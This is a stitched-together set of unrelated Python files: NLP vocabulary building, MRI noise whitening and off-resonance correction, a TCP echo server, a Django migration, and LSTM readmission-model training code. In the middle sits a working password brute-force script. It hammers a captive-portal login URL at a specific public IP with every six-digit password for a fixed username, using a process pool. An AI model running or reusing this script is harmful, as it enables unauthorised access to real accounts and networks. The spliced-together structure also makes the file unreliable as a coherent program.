        json.dump(dict(d), f, indent=4)
def update_vocab(txt_path, vocab):
    """Update the different vocabularies from the dataset

    Args:
        txt_path: (string) path to file, one sentence per line
        vocab: (dict or Counter) with update method

    Returns:
        dataset_size: (int) number of lines (sentences) in the file
    """
    # Fix: the original returned `i + 1` from the loop variable, which
    # raised NameError on an empty file; track the count explicitly and
    # return 0 for an empty file.
    num_lines = 0
    with open(txt_path, 'r', encoding='utf-8') as f:
        for num_lines, line in enumerate(f, start=1):
            vocab.update(line.strip().split(' '))
    return num_lines
if __name__ == '__main__':
    args = parser.parse_args()

    # Build token vocab with train, val and test datasets
    print("Building token vocabulary...")
    tokens = Counter()
    size_train_sentences = update_vocab(os.path.join(args.data_dir, 'train/tokens.txt'), tokens)
    size_dev_sentences = update_vocab(os.path.join(args.data_dir, 'val/tokens.txt'), tokens)
    size_test_sentences = update_vocab(os.path.join(args.data_dir, 'test/tokens.txt'), tokens)
    print("Done.")

    # Build lemma vocab with train, val and test datasets
    print("Building lemma vocabulary...")
    lemmas = Counter()
    size_train_lemmas = update_vocab(os.path.join(args.data_dir, 'train/lemmas.txt'), lemmas)
    size_dev_lemmas = update_vocab(os.path.join(args.data_dir, 'val/lemmas.txt'), lemmas)
    size_test_lemmas = update_vocab(os.path.join(args.data_dir, 'test/lemmas.txt'), lemmas)
    print("Done.")

    # Build pos vocab with train, val and test datasets
    print("Building pos vocabulary...")
    pos = Counter()
    size_train_pos = update_vocab(os.path.join(args.data_dir, 'train/pos.txt'), pos)
    size_dev_pos = update_vocab(os.path.join(args.data_dir, 'val/pos.txt'), pos)
    size_test_pos = update_vocab(os.path.join(args.data_dir, 'test/pos.txt'), pos)
    print("Done.")

    # Build tag vocab with train and test datasets
    print("Building tag vocabulary...")
    tags = Counter()
    size_train_tags = update_vocab(os.path.join(args.data_dir, 'train/labels.txt'), tags)
    size_dev_tags = update_vocab(os.path.join(args.data_dir, 'val/labels.txt'), tags)
    size_test_tags = update_vocab(os.path.join(args.data_dir, 'test/labels.txt'), tags)
    print("Done.")

    # Assert same number of examples in datasets (files must be aligned
    # line-for-line across tokens/lemmas/pos/labels)
    assert size_train_sentences == size_train_lemmas == size_train_pos == size_train_tags
    assert size_dev_sentences == size_dev_lemmas == size_dev_pos == size_dev_tags
    assert size_test_sentences == size_test_lemmas == size_test_pos == size_test_tags

    # Transforming to lists (insertion order of the Counter)
    tokens = [tok for tok, count in tokens.items()]
    lemmas = [tok for tok, count in lemmas.items()]
    pos = [tok for tok, count in pos.items()]
    tags = [tok for tok, count in tags.items()]

    # Add pad tokens
    if PAD_WORD not in tokens: tokens.insert(0, PAD_WORD)
    if PAD_WORD not in lemmas: lemmas.insert(0, PAD_WORD)
    if PAD_WORD not in pos: pos.insert(0, PAD_WORD)

    # add word for unknown words
    tokens.insert(0, UNK_WORD)
    lemmas.insert(0, UNK_WORD)
    pos.insert(0, UNK_WORD)

    # Save vocabularies to file (line number == token id)
    print("Saving vocabularies to file...")
    save_vocab_to_txt_file(tokens, os.path.join(args.data_dir, 'tokens_vocab.txt'))
    save_vocab_to_txt_file(lemmas, os.path.join(args.data_dir, 'lemmas_vocab.txt'))
    save_vocab_to_txt_file(pos, os.path.join(args.data_dir, 'pos_vocab.txt'))
    save_vocab_to_txt_file(tags, os.path.join(args.data_dir, 'labels_vocab.txt'))
    print("- done.")

    # Save datasets properties in json file
    sizes = {
        'train_size': size_train_sentences,
        'dev_size': size_dev_sentences,
        'test_size': size_test_sentences,
        'vocab_size': len(tokens),
        'number_of_lemmas': len(lemmas),
        'number_of_pos': len(pos),
        'number_of_labels': len(tags),
        'pad_word': PAD_WORD,
        'unk_word': UNK_WORD
    }
    save_dict_to_json(sizes, os.path.join(args.data_dir, 'dataset_params.json'))

    # Logging sizes
    to_print = "\n".join("- {}: {}".format(k, v) for k, v in sizes.items())
    print("Characteristics of the dataset:\n{}".format(to_print))
# -*- coding: utf-8 -*-
"""MRI utilities.
"""
import numpy as np
import sigpy as sp
__all__ = ["get_cov", "whiten", "tseg_off_res_b_ct", "apply_tseg"]
def get_cov(noise):
    """Get covariance matrix from noise measurements.

    Args:
        noise (array): Noise measurements of shape [num_coils, ...]

    Returns:
        array: num_coils x num_coils covariance matrix.
    """
    num_coils = noise.shape[0]
    X = noise.reshape([num_coils, -1])
    # Fix: subtract the per-coil mean out-of-place.  The original used an
    # in-place `-=` on what reshape usually returns as a *view*, silently
    # modifying the caller's `noise` array.
    X = X - np.mean(X, axis=-1, keepdims=True)
    cov = np.matmul(X, X.T.conjugate())
    return cov
def whiten(ksp, cov):
    """Whitens k-space measurements.

    Args:
        ksp (array): k-space measurements of shape [num_coils, ...]
        cov (array): num_coils x num_coils covariance matrix.

    Returns:
        array: whitened k-space array, same shape as ``ksp``.
    """
    num_coils = ksp.shape[0]
    # Solve L y = x against the Cholesky factor of the covariance, then
    # restore the original shape.
    flat = ksp.reshape([num_coils, -1])
    chol = np.linalg.cholesky(cov)
    whitened = np.linalg.solve(chol, flat)
    return whitened.reshape(ksp.shape)
def tseg_off_res_b_ct(b0, bins, lseg, dt, T):
    """Creates B and Ct matrices needed for time-segmented off-resonance
    compensation.

    Args:
        b0 (array): inhomogeneity matrix.
        bins (int): number of histogram bins to use.
        lseg (int): number of time segments.
        dt (float): hardware dwell time (ms).
        T (float): length of pulse (ms).

    Returns:
        2-element tuple containing

        - **B** (*array*): temporal interpolator.
        - **Ct** (*array*): off-resonance phase at each time segment center.
    """
    # create time vector
    t = np.linspace(0, T, int(T / dt))
    # Histogram the off-resonance values (scaled to rad/s) so the fit runs
    # over a compact set of representative frequencies rather than all voxels.
    hist_wt, bin_edges = np.histogram(
        np.imag(2j * np.pi * np.concatenate(b0)), bins
    )
    # Build B and Ct
    bin_centers = bin_edges[1:] - bin_edges[1] / 2
    zk = 0 + 1j * bin_centers
    tl = np.linspace(0, lseg, lseg) / lseg * T / 1000  # time seg centers
    # calculate off-resonance phase @ each time seg, for hist bins
    ch = np.exp(-np.expand_dims(tl, axis=1) @ np.expand_dims(zk, axis=0))
    # Weighted least-squares fit of the interpolator, weighted by the
    # histogram counts (sqrt on both sides of the normal equations).
    w = np.diag(np.sqrt(hist_wt))
    p = np.linalg.pinv(w @ np.transpose(ch)) @ w
    b = p @ np.exp(
        -np.expand_dims(zk, axis=1) @ np.expand_dims(t, axis=0) / 1000
    )
    b = np.transpose(b)
    # Per-voxel phase at each time-segment center.
    b0_v = np.expand_dims(2j * np.pi * np.concatenate(b0), axis=0)
    ct = np.transpose(np.exp(-np.expand_dims(tl, axis=1) @ b0_v))
    return b, ct
def apply_tseg(array_in, coord, b, ct, fwd=True):
    """Apply the temporal interpolator and phase shift maps calculated

    Args:
        array_in (array): array to apply correction to.
        coord (array): coordinates for noncartesian trajectories. [Nt 2].
        b (array): temporal interpolator.
        ct (array): off-resonance phase at each time segment center.
        fwd (Boolean): indicates forward direction (img -> kspace) or
            backward (kspace->img)

    Returns:
        out (array): array with correction applied.
    """
    # get number of time segments from B input.
    lseg = b.shape[1]
    # assumes array_in flattens back to a square (dim x dim) image — TODO confirm
    dim = array_in.shape[0]
    out = 0
    if fwd:
        # Forward (img -> kspace): phase-modulate by each segment's map,
        # NUFFT, then combine with the temporal interpolator weights.
        for ii in range(lseg):
            ctd = np.reshape(ct[:, ii] * array_in.flatten(), (dim, dim))
            # NOTE(review): `coord * 20` looks like a trajectory-units
            # scaling — confirm against the caller's coordinate convention.
            out = out + b[:, ii] * sp.fourier.nufft(ctd, coord * 20)
    else:
        # Backward (kspace -> img): conjugate phase/interpolator instead.
        for ii in range(lseg):
            ctd = np.reshape(
                np.conj(ct[:, ii]) * array_in.flatten(), (dim, dim)
            )
            out = out + sp.fourier.nufft(ctd, coord * 20) * np.conj(b[:, ii])
    return np.expand_dims(out, 1)
|
#!/usr/bin/env python
# encoding: utf-8
import time
import requests
import re
from multiprocessing import Pool
def get(pwd):
    # WARNING(review): sends one login attempt with candidate password
    # `pwd` to a captive-portal endpoint and checks the error marker in
    # the response.  This is a credential brute-force helper — do not run
    # it against accounts you do not own.
    url='http://222.179.99.144:8080/eportal/webGateModeV2.do?method=login¶m=true&wlanuserip=10.117.30.232&wlanacname=Ruijie_Ac_80eeb9&ssid=CQWU&nasip=192.168.255.5&mac=f6995122027c&t=wireless-v2-plain&url=http://web.archive.org/web/20151116122728/http://segmentfault.com/a/1190000000356021&username=2013&pwd='+str(pwd)
    # print(url)
    webdata=requests.get(url)
    # print(webdata.text)
    # Extract the portal's error-info div; the slice strips the list repr.
    pattern=re.compile('<div id="errorInfo_center" val="(.*?)"></div>')
    judge=str(pattern.findall(webdata.text))[2:-2]
    if judge!='认证失败!,密码不匹配,请输入正确的密码!': #
        print("密码:%s success! >>>>>%s"%(pwd,judge))
        return True
    else:
        print(pwd+' was test!')
def loop():
    # Generator of zero-padded 6-digit candidate strings, resuming the
    # search at 258146.
    for i in range(258146,1000000):
        a="%06d"%i
        yield a
def timed(func):
    """Decorator that prints how long *func* took to run, in seconds."""
    def wrapper():
        # Fix: time.clock() was deprecated in 3.3 and removed in Python
        # 3.8; time.perf_counter() is the documented replacement.
        start = time.perf_counter()
        func()
        end = time.perf_counter()
        print('%.1f seconds'%(end - start))
    return wrapper
@timed
def main():
    # Fan the candidate generator out over a process pool; pool.map
    # consumes the whole generator, one guess per task.
    gen = loop()
    pool = Pool()
    pool.map(get, gen)
    # pool.close()
    # pool.join()
@timed
def slown():
    # Single-process variant kept for speed comparison: tries only the
    # first 1000 codes sequentially.
    for i in range(1000):
        a = "%06d" % i
        get(a)


if __name__ == '__main__':
    main()
    # slown()
|
#!/usr/bin/python
try:
import SocketServer as socketserver
except ImportError:
import socketserver
class MyTCPHandler(socketserver.BaseRequestHandler):
    """Request handler that echoes the client's message upper-cased."""

    def handle(self):
        # Read one chunk, log the sender address, and reply with the
        # upper-cased UTF-8 text.
        self.data = self.request.recv(1024).strip()
        print("{} wrote:".format(self.client_address[0]))
        text = self.data.decode('utf-8')
        print(text)
        self.request.sendall(text.upper().encode('utf-8'))
if __name__ == '__main__':
    # Listen on all interfaces, port 4001, serving one request at a time
    # until interrupted.
    HOST, PORT = '0.0.0.0', 4001
    server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)
    server.serve_forever()
# Generated by Django 3.0.6 on 2020-06-12 09:47
import colorfield.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds size flags and three color
    # fields to the Item model.
    # NOTE(review): 'extra_samll' is a typo but it is the real column name
    # created by this migration; fixing it needs a follow-up rename
    # migration, not an edit here.

    dependencies = [
        ('Home', '0015_auto_20200611_1907'),
    ]

    operations = [
        migrations.AddField(
            model_name='item',
            name='extra_large',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='item',
            name='extra_samll',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='item',
            name='item_color1',
            field=colorfield.fields.ColorField(default='#FF0000', max_length=18),
        ),
        migrations.AddField(
            model_name='item',
            name='item_color2',
            field=colorfield.fields.ColorField(default='#FF0000', max_length=18),
        ),
        migrations.AddField(
            model_name='item',
            name='item_color3',
            field=colorfield.fields.ColorField(default='#FF0000', max_length=18),
        ),
        migrations.AddField(
            model_name='item',
            name='large',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='item',
            name='small',
            field=models.BooleanField(default=True),
        ),
    ]
|
import time
import torch
import numbers
from collections import Counter
import torch
import torch.functional as F
from torch.nn.utils.rnn import pad_sequence
from torchtext.datasets import text_classification
from torchtext.vocab import Vocab
import metrics
import numpy as np
_t0 = time.time()
def log(*args, **kwargs):
    """Print *args prefixed with minutes elapsed since module import (_t0)."""
    global _t0
    print("{:8.2f}: ".format((time.time() - _t0) / 60), end="")
    print(*args, **kwargs)
def generate_batch(batch):
    '''Reformat data for fn_collate.

    batch is a list of (pid, label, text) tuples; text entries have
    variable length and are zero-padded to the batch maximum.

    Returns (ids, padded text [batch, max_len], per-sequence lengths
    [batch], stacked float labels [batch]).
    '''
    ids = [entry[0] for entry in batch]
    labels = torch.stack([entry[1] for entry in batch]).float()
    sequences = [entry[2] for entry in batch]
    # Actual (unpadded) length of each sequence, needed downstream to
    # distinguish real tokens from padding.
    offsets = torch.tensor([len(seq) for seq in sequences], dtype=torch.int64)
    padded = pad_sequence(sequences, batch_first=True)
    return ids, padded, offsets, labels
def count_parameters(model):
    '''Count the total number of trainable parameters in model
    (only tensors with requires_grad set).'''
    total = 0
    for param in model.parameters():
        if param.requires_grad:
            total += param.numel()
    return total
def epoch_time(start_time, end_time):
    '''Calculate total amount of time spent training as (minutes, seconds).'''
    elapsed = end_time - start_time
    minutes = int(elapsed / 60)
    # Remaining whole seconds after the full minutes are removed.
    seconds = int(elapsed - minutes * 60)
    return minutes, seconds
def build_lstm_dataset(
    datapath,
    min_freq=10,
    uid_colname="discharge_id",
    target_colname="unplanned_readmission",
    x_inputs=[str(x) for x in range(999, -1, -1)],
    target_value="True",
    vocab=None,
    pos_labs_vocab=False,
    nrows=1e9,
    rev=True,
):
    '''
    Reads in dataset line by line, creates vocabulary and subsets dataset
    into a torchtext TextClassificationDataset.

    Note: Key difference to transformer build_dataset (has remove_death,
    build_vocab functions together):
    1. Line by line reading, as the 1000 format CSV file takes a long time to read via pandas
    2. Incorporates remove death immediately
    3. Builds vocabulary here

    Arguments:
    ---------
    datapath (str) : path to 1000 CSV file
    min_freq (int) : minimum frequency for vocabulary
    uid_colname (str) : name of unique identifier in each row (patient_id, discharge_dt)
    target_colname (str) : column name of target label
    x_inputs (list) : list of columns to be used as inputs (read-only;
        the mutable default is never modified)
    target_value (str) : value to take as positive label
    vocab (Vocab) : default None creates vocabulary. Will use provided vocab if given.
    pos_labs_vocab (bool) : use only vocabulary from positive label cases
    nrows (int) : number of rows to process
    rev (bool) : reverse each row's token sequence

    Returns:
    --------
    torchtext TextClassificationDataset whose examples are
    (uid, label tensor, token-id tensor) triples
    '''

    def valid_token(t):
        # Drop empty cells and explicit padding markers.
        return len(t) != 0 and t != "<pad>"

    log("Build token list")
    token_list = []
    with open(datapath, "r") as f:
        # determine column mapping from the header row
        header = f.readline()
        header = [h.replace(" ", "").replace("\n", "") for h in header.split(",")]
        target_index = header.index(target_colname)
        uid_index = header.index(uid_colname)
        x_idxes = [header.index(colname) for colname in x_inputs]

        # start processing
        invalid_uid = 0
        deaths = 0
        line = f.readline()
        while line:
            if 'death' in line:
                # BUG FIX: the original used `pass` here, which fell
                # through and still processed 'death' rows even though the
                # log reported them as skipped.  Count them and move on.
                deaths += 1
            else:
                tokens = line.split(",")
                if len(tokens[uid_index]) == 0:
                    invalid_uid += 1  # some UIDs are missing
                else:
                    uid = tokens[uid_index]
                    label = 1 if tokens[target_index].startswith(target_value) else 0
                    tokens = [tokens[idx] for idx in x_idxes]
                    tokens = [t.strip().replace('\n', '') for t in tokens if valid_token(t)]
                    if rev:
                        tokens = tokens[::-1]
                    token_list.append((uid, label, tokens))
            line = f.readline()
            if len(token_list) == nrows:
                break

    if vocab is None:
        log("Build counter")
        counter = Counter()
        for uid, label, tokens in token_list:
            # Optionally restrict vocabulary counts to positive-label rows.
            if label or not pos_labs_vocab:
                counter.update(tokens)
        log("Build vocab")
        vocab = Vocab(counter, min_freq=min_freq, specials=["<pad>", "<unk>"])

    log("Build data")
    data = [
        (pid, torch.tensor([label]), torch.tensor([vocab.stoi[t] for t in tokens]))
        for pid, label, tokens in token_list
    ]
    labels = set(["readmission"])

    log("Build pytorch dataset")
    log(f"Skipped {invalid_uid} invalid patients")
    log(f"Skipped {deaths} dead patients")
    dataset = text_classification.TextClassificationDataset(vocab, data, labels)
    log("Done")
    return dataset
def epoch_train_lstm(
    model,
    dataloader,
    optimizer,
    criterion,
    test=0
):
    """
    Train model for one epoch over *dataloader*.

    The hidden state is re-initialized and detached for every batch via
    model.init_hidden / repackage_hidden, so no gradients flow between
    batches.  Model must define .init_hidden and expose a .device attribute.

    Args:
    -----
    model (nn.Module): lstm general attention model
    dataloader : iterator for dataset, yields (ids, sequence, seq length, labels)
    optimizer : optimizer stepped once per batch
    criterion : loss function; receives raw model outputs (the AUC metric
        below applies sigmoid itself, so outputs are presumably logits --
        confirm against the model)
    test (int) : if non-zero, stop after roughly this many batches
        (quick smoke-test mode)

    Returns:
    ----------
    tuple containing:
        average loss for whole epoch,
        AUC computed once over all predictions made this epoch
    """
    import copy
    from sklearn.metrics import roc_auc_score
    def repackage_hidden(h):
        """
        Wraps hidden states in new Tensors, to detach them from their history.
        Needed to prevent RNN+Attention backpropagating between batches.
        """
        if isinstance(h, torch.Tensor):
            return h.detach()
        else:
            return tuple(repackage_hidden(v) for v in h)
    epoch_loss = 0
    epoch_metric = 0
    model.train()
    # initialize lists to compare predictions & ground truth labels for metric calculation
    order_labels = []
    prediction_scores = []
    if test: # test function on small number of batches
        counter = 0
    for idx, (ids, text, text_lengths, labels) in enumerate(dataloader):
        optimizer.zero_grad()
        # fresh (detached) hidden state sized to this batch
        hidden = model.init_hidden(text.shape[0])
        hidden = repackage_hidden(hidden)
        text, text_lengths, labels = (
            text.to(model.device),
            text_lengths,
            labels.to(model.device),
        )
        predictions, hidden = model(text, text_lengths, hidden)
        #predictions = model(text, text_lengths).squeeze(1)
        loss = criterion(predictions, labels.type_as(predictions))
        loss.backward()
        optimizer.step()
        # prevent internal pytorch timeout due to too many file opens by multiprocessing
        copied_labels = copy.deepcopy(labels.detach().cpu().numpy())
        del labels
        order_labels.extend(copied_labels)
        copied_preds = copy.deepcopy(predictions.detach().cpu().numpy())
        del predictions
        prediction_scores.extend(copied_preds)
        epoch_loss += loss.item()
        if test:
            if counter >= test:
                break
            counter += 1
    # AUC over the whole epoch (not averaged per batch); sigmoid turns raw
    # outputs into scores
    epoch_metric = roc_auc_score(order_labels, torch.sigmoid(torch.Tensor(prediction_scores)))
    return epoch_loss / len(dataloader), epoch_metric
def epoch_val_lstm(
    model, dataloader, criterion, return_preds=False, test=0, max_len=1000
):
    """
    Evaluate model on a dataset (gradients disabled).

    The hidden state is re-initialized for every batch via
    model.init_hidden / repackage_hidden; the model is called with
    explain=True and must return (predictions, hidden, attn_weights).

    Args:
        model : lstm attention model with .device and .init_hidden
        dataloader : iterator for dataset, yields (ids, sequence, seq length, labels)
        criterion : loss function (AUC below applies sigmoid to raw outputs)
        return_preds : bool default False
            If enabled, also returns (ids, predictions, labels, attn, events)
        test (int) : if non-zero, stop after roughly this many batches
        max_len (int) : width attention/feature matrices are padded to when
            return_preds is enabled (previously ignored: 1000 was hard-coded)

    Returns:
        tuple containing:
            average loss for whole epoch,
            AUC over all predictions made this epoch
        if return_preds is enabled, also returns additional tuple:
            ids, predictions, labels, attn, events
    """
    import copy
    from sklearn.metrics import roc_auc_score
    def repackage_hidden(h):
        """
        Wraps hidden states in new Tensors, to detach them from their history.
        Needed to prevent RNN+Attention backpropagating between batches.
        """
        if isinstance(h, torch.Tensor):
            return h.detach()
        else:
            return tuple(repackage_hidden(v) for v in h)
    def detach_and_copy(val):
        # deep-copy to numpy so nothing keeps the source tensor alive
        copied = copy.deepcopy(val.detach().cpu().numpy())
        del val
        return copied
    epoch_loss = 0
    model.eval()
    # initialize lists to compare predictions & ground truth labels for metric calculation
    order_labels = []
    prediction_scores = []
    if return_preds:
        ids_lst = []
        attn = [None] * len(dataloader)
        feat = [None] * len(dataloader)
    if test: # test function on small number of batches
        counter = 0
    with torch.no_grad():
        for idx, (ids, text, text_lengths, labels) in enumerate(dataloader):
            text, text_lengths, labels = (
                text.to(model.device),
                text_lengths,
                labels.to(model.device),
            )
            hidden = model.init_hidden(text.shape[0])
            hidden = repackage_hidden(hidden)
            predictions, hidden, attn_weights = model(
                text, text_lengths, hidden, explain=True
            )
            loss = criterion(predictions, labels.type_as(predictions))
            # BUGFIX: the batch loss was previously added twice per batch
            # (once here and once after the return_preds block), doubling
            # the reported validation loss. Count it exactly once.
            epoch_loss += loss.item()
            # prevent internal pytorch timeout due to too many file opens by multiprocessing
            order_labels.extend(detach_and_copy(labels))
            prediction_scores.extend(detach_and_copy(predictions))
            if return_preds:
                ids_lst.extend(copy.deepcopy(ids))
                attn[idx] = detach_and_copy(attn_weights)
                feat[idx] = detach_and_copy(text)
            if test:
                if counter >= test:
                    break
                counter += 1
    epoch_metric = roc_auc_score(order_labels, torch.sigmoid(torch.Tensor(prediction_scores)))
    return_tuple = (epoch_loss / len(dataloader), epoch_metric)
    if return_preds:
        # return sizing not always consistent: ensure same dimensions and length
        # NOTE(review): with test>0 the trailing attn/feat slots stay None
        # and would break below -- pre-existing behavior, confirm intent.
        attn = [
            np.squeeze(cur_attn, 2) if len(cur_attn.shape) == 3 else cur_attn
            for cur_attn in attn
        ]
        # pad each attention matrix with zero columns out to max_len
        attn = [
            np.concatenate(
                (
                    cur_attn,
                    np.zeros(
                        (cur_attn.shape[0], abs(cur_attn.shape[1] - max_len))
                    ),
                ),
                1,
            )
            if cur_attn.shape[1] != max_len
            else cur_attn
            for cur_attn in attn
        ]
        attn = np.concatenate(attn)
        # same zero-padding for the feature (token id) matrices
        feat = [
            np.concatenate(
                (cur_feat,
                 np.zeros(
                    (cur_feat.shape[0], abs(cur_feat.shape[1] - max_len)))
                ), 1
            )
            if cur_feat.shape[1] != max_len
            else cur_feat
            for cur_feat in feat
        ]
        feat = np.concatenate(feat)
        return_tuple = return_tuple + ((ids_lst, prediction_scores, order_labels, attn, feat),)
    return return_tuple
def epoch_val_lstm_v2(
    model, dataloader, criterion, return_preds=False, test=0, max_len=1000
):
    """
    Evaluate model on a dataset (gradients disabled) -- v2 variant.

    Unlike epoch_val_lstm, the model manages its own hidden state: it is
    called with the batch size instead of an explicit hidden tuple, and
    must return (predictions, hidden, attn_weights) when explain=True.

    Args:
        model : lstm attention model with .device
        dataloader : iterator for dataset, yields (ids, sequence, seq length, labels)
        criterion : loss function (AUC below applies sigmoid to raw outputs)
        return_preds : bool default False
            If enabled, also returns (ids, predictions, labels, attn, events)
        test (int) : if non-zero, stop after roughly this many batches
        max_len (int) : width attention/feature matrices are padded to when
            return_preds is enabled (previously ignored: 1000 was hard-coded)

    Returns:
        tuple containing:
            average loss for whole epoch,
            AUC over all predictions made this epoch
        if return_preds is enabled, also returns additional tuple:
            ids, predictions, labels, attn, events
    """
    import copy
    from sklearn.metrics import roc_auc_score
    def detach_and_copy(val):
        # deep-copy to numpy so nothing keeps the source tensor alive
        copied = copy.deepcopy(val.detach().cpu().numpy())
        del val
        return copied
    epoch_loss = 0
    model.eval()
    # initialize lists to compare predictions & ground truth labels for metric calculation
    order_labels = []
    prediction_scores = []
    if return_preds:
        ids_lst = []
        attn = [None] * len(dataloader)
        feat = [None] * len(dataloader)
    if test: # test function on small number of batches
        counter = 0
    with torch.no_grad():
        for idx, (ids, text, text_lengths, labels) in enumerate(dataloader):
            text, text_lengths, labels = (
                text.to(model.device),
                text_lengths,
                labels.to(model.device),
            )
            predictions, hidden, attn_weights = model(
                text, text_lengths, text.shape[0], explain=True
            )
            loss = criterion(predictions, labels.type_as(predictions))
            # BUGFIX: the batch loss was previously added twice per batch
            # (once here and once after the return_preds block), doubling
            # the reported validation loss. Count it exactly once.
            epoch_loss += loss.item()
            # prevent internal pytorch timeout due to too many file opens by multiprocessing
            order_labels.extend(detach_and_copy(labels))
            prediction_scores.extend(detach_and_copy(predictions))
            if return_preds:
                ids_lst.extend(copy.deepcopy(ids))
                attn[idx] = detach_and_copy(attn_weights)
                feat[idx] = detach_and_copy(text)
            if test:
                if counter >= test:
                    break
                counter += 1
    epoch_metric = roc_auc_score(order_labels, torch.sigmoid(torch.Tensor(prediction_scores)))
    return_tuple = (epoch_loss / len(dataloader), epoch_metric)
    if return_preds:
        # return sizing not always consistent: ensure same dimensions and length
        # NOTE(review): with test>0 the trailing attn/feat slots stay None
        # and would break below -- pre-existing behavior, confirm intent.
        attn = [
            np.squeeze(cur_attn, 2) if len(cur_attn.shape) == 3 else cur_attn
            for cur_attn in attn
        ]
        # pad each attention matrix with zero columns out to max_len
        attn = [
            np.concatenate(
                (
                    cur_attn,
                    np.zeros(
                        (cur_attn.shape[0], abs(cur_attn.shape[1] - max_len))
                    ),
                ),
                1,
            )
            if cur_attn.shape[1] != max_len
            else cur_attn
            for cur_attn in attn
        ]
        attn = np.concatenate(attn)
        # same zero-padding for the feature (token id) matrices
        feat = [
            np.concatenate(
                (cur_feat,
                 np.zeros(
                    (cur_feat.shape[0], abs(cur_feat.shape[1] - max_len)))
                ), 1
            )
            if cur_feat.shape[1] != max_len
            else cur_feat
            for cur_feat in feat
        ]
        feat = np.concatenate(feat)
        return_tuple = return_tuple + ((ids_lst, prediction_scores, order_labels, attn, feat),)
    return return_tuple
def get_average_accuracy(preds, y):
    """
    Return the fraction of correct predictions, e.g. 8/10 right gives 0.8.
    Averaged over all classes when preds has a second (class) dimension.
    Args:
        preds (torch.Tensor): raw model outputs; >0 counts as a positive call
        y (torch.Tensor): correct labels; ==1 counts as positive
    Returns:
        float: calculated accuracy
    """
    if preds.dim() == 2:
        num_class = preds.shape[1]
    else:
        num_class = preds.dim()
    correct = ((preds > 0) == (y == 1)).sum().item()
    return correct / num_class / len(preds)
def get_individual_acc(preds, y):
    """
    Compute per-class accuracy, returned as a list in column order.
    Assumes preds and y are 2-D (batch x classes).
    Args:
        preds (torch.Tensor): predictions from model
        y (torch.Tensor): correct labels
    Returns:
        list: accuracy for each class
    """
    return [
        get_average_accuracy(preds[:, col], y[:, col])
        for col in range(preds.shape[1])
    ]
def evaluate(model, iterator, criterion, device, return_preds=False, detach_hidden=False, batch_size=0):
    """
    Evaluate model on a dataset (gradients disabled).
    Args:
        model : any pytorch model with defined forward
        iterator : iterator for dataset, yields (ids, sequence, seq length, labels)
        criterion: loss function
        device: cpu or gpu
        return_preds : bool default False
            If enabled, also returns predictions and labels
        detach_hidden : bool default False
            Set to true if AttentionRNN is used
            Model must have .init_hidden function defined
        batch_size : int default 0
            used when detach_hidden is enabled
            to create the correct hidden sizes during initialization
    Returns:
        tuple containing:
            average loss for whole epoch,
            average accuracy for whole epoch
        if return_preds is enabled, also returns:
            predictions
            labels
    """
    def repackage_hidden(h):
        # Detach hidden state tensors from their history.  BUGFIX: defined
        # locally because no module-level repackage_hidden exists -- the old
        # code raised NameError whenever detach_hidden=True.
        if isinstance(h, torch.Tensor):
            return h.detach()
        return tuple(repackage_hidden(v) for v in h)
    epoch_loss = 0
    epoch_acc = 0
    model.eval()
    if return_preds:
        preds = [None] * len(iterator)
        y = [None] * len(iterator)
    with torch.no_grad():
        for idx, (ids, text, text_lengths, labels) in enumerate(iterator):
            text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
            if detach_hidden:
                hidden = model.init_hidden(batch_size)
                hidden = repackage_hidden(hidden)
                predictions, hidden = model(text, text_lengths, hidden)
            else:
                predictions = model(text, text_lengths).squeeze(1)
            loss = criterion(predictions, labels.type_as(predictions))
            acc = get_average_accuracy(predictions, labels)
            if return_preds:
                preds[idx] = predictions
                y[idx] = labels
            epoch_loss += loss.item()
            epoch_acc += acc
    if return_preds:
        return epoch_loss / len(iterator), epoch_acc / len(iterator), torch.cat(preds), torch.cat(y)
    return epoch_loss / len(iterator), epoch_acc / len(iterator)
def evaluate_explain(model, iterator, criterion, device, return_preds=False,
                     detach_hidden=False, batch_size=0, explain=False,
                     max_length=1000):
    """
    Evaluate model on a dataset (gradients disabled), optionally collecting
    attention weights and input features for explanation.
    Args:
        model : any pytorch model with defined forward
        iterator : iterator for dataset, yields (sequence, seq length, labels)
        criterion: loss function
        device: cpu or gpu
        return_preds : bool default False
            If enabled, also returns predictions and labels
        detach_hidden : bool default False
            Set to true if AttentionRNN is used
            Model must have .init_hidden function defined
        batch_size : int default 0
            used when detach_hidden is enabled
            to create the correct hidden sizes during initialization
        explain : bool default False
            if enabled (with detach_hidden), the model is called with
            explain=True and attention weights/features are collected
        max_length : int, width attention/feature matrices are padded to
    Returns:
        tuple containing:
            average loss for whole epoch,
            average accuracy for whole epoch
        if return_preds is enabled, also returns predictions and labels
        if explain is enabled, also returns attn and feature tensors
    """
    def repackage_hidden(h):
        # Detach hidden state tensors from their history.  BUGFIX: defined
        # locally because no module-level repackage_hidden exists -- the old
        # code raised NameError whenever detach_hidden=True.
        if isinstance(h, torch.Tensor):
            return h.detach()
        return tuple(repackage_hidden(v) for v in h)
    epoch_loss = 0
    epoch_acc = 0
    model.eval()
    if return_preds:
        preds = [None] * len(iterator)
        y = [None] * len(iterator)
    if explain:
        attn = [None] * len(iterator)
        feat = [None] * len(iterator)
    with torch.no_grad():
        for idx, (text, text_lengths, labels) in enumerate(iterator):
            text, text_lengths, labels = text.to(device), text_lengths.to(device), labels.to(device)
            if detach_hidden:
                hidden = model.init_hidden(batch_size)
                hidden = repackage_hidden(hidden)
                if explain:
                    predictions, hidden, attn_weights = model(text, text_lengths, hidden, explain=True)
                else:
                    predictions, hidden = model(text, text_lengths, hidden)
            else:
                predictions = model(text, text_lengths).squeeze(1)
            loss = criterion(predictions, labels.type_as(predictions))
            acc = get_average_accuracy(predictions, labels)
            if return_preds:
                preds[idx] = predictions
                y[idx] = labels
            if explain:
                attn[idx] = attn_weights
                feat[idx] = text
            epoch_loss += loss.item()
            epoch_acc += acc
    return_tuple = (epoch_loss / len(iterator), epoch_acc / len(iterator))
    if return_preds:
        return_tuple = return_tuple + (torch.cat(preds), torch.cat(y),)
    if explain:
        # normalize shapes and zero-pad every batch out to max_length columns
        # so the per-batch tensors can be concatenated
        for idx, cur_attn in enumerate(attn):
            if len(cur_attn.size()) == 3:
                cur_attn = cur_attn.squeeze(2)
            attn[idx] = cur_attn
